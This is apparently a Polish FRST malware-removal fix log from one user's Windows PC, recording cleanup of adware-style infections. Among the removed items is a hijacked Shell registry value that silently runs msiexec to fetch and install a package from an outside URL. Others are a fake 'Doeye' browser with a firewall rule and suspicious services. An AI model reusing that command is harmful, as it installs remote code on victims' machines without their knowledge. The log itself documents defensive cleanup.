Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 23-04-2017 01 Uruchomiony przez Siekacz (26-04-2017 11:46:59) Run:2 Uruchomiony z E:\ Załadowane profile: Siekacz (Dostępne profile: defaultuser0 & Siekacz) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** FirewallRules: [{D738DD82-FAC6-40E1-A385-E77953F8FBCC}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-2052021202-869729798-2290752325-1001\...\RunOnce: [Uninstall C:\Users\Siekacz\AppData\Local\Microsoft\OneDrive\17.3.6381.0405\amd64] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Siekacz\AppData\Local\Microsoft\OneDrive\17.3.6381.0405\amd64" HKU\S-1-5-21-2052021202-869729798-2290752325-1001\...\RunOnce: [Uninstall C:\Users\Siekacz\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Siekacz\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64" HKU\S-1-5-21-2052021202-869729798-2290752325-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8cNdNXNURQFdH2OTlXFdNYFdHxMWk5Fdk3RUEyRTE4Nc== /q GroupPolicy: Ograniczenia <======= UWAGA HKU\S-1-5-21-2052021202-869729798-2290752325-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe <==== UWAGA S2 3DM; C:\Users\Siekacz\AppData\Local\3DM\Kitty.dll [X] R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] 2017-04-26 09:40 - 2017-04-26 09:40 - 00003338 _____ C:\Windows\System32\Tasks\{A6FE2AEC-97C9-47F3-98B9-F6638CDCDEE8} EmptyTemp: ***************** HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D738DD82-FAC6-40E1-A385-E77953F8FBCC} => Wartość pomyślnie usunięto HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Wartość pomyślnie usunięto HKU\S-1-5-21-2052021202-869729798-2290752325-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\\Uninstall C:\Users\Siekacz\AppData\Local\Microsoft\OneDrive\17.3.6381.0405\amd64 => Wartość pomyślnie usunięto HKU\S-1-5-21-2052021202-869729798-2290752325-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\\Uninstall C:\Users\Siekacz\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64 => Wartość pomyślnie usunięto HKU\S-1-5-21-2052021202-869729798-2290752325-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto C:\Windows\system32\GroupPolicy\Machine => pomyślnie przeniesiono C:\Windows\system32\GroupPolicy\GPT.ini => pomyślnie przeniesiono C:\Windows\SysWOW64\GroupPolicy\GPT.ini => pomyślnie przeniesiono HKU\S-1-5-21-2052021202-869729798-2290752325-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => klucz pomyślnie usunięto HKLM\System\CurrentControlSet\Services\3DM => klucz pomyślnie usunięto 3DM => serwis pomyślnie usunięto ibtsiva => Nie można zatrzymać usługi. HKLM\System\CurrentControlSet\Services\ibtsiva => klucz pomyślnie usunięto ibtsiva => serwis pomyślnie usunięto C:\Windows\System32\Tasks\{A6FE2AEC-97C9-47F3-98B9-F6638CDCDEE8} => pomyślnie przeniesiono =========== EmptyTemp: ========== BITS transfer queue => 32768 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 11715019 B Java, Flash, Steam htmlcache => 8000288 B Windows/system/drivers => 9931470 B Edge => 110 B Chrome => 0 B Firefox => 9554846 B Opera => 116095366 B Temp, IE cache, history, cookies, recent: Default => 6656 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 722 B systemprofile32 => 0 B LocalService => 0 B NetworkService => 0 B defaultuser0 => 128 B Siekacz => 38543068 B RecycleBin => 0 B EmptyTemp: => 184.9 MB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 11:47:08 ====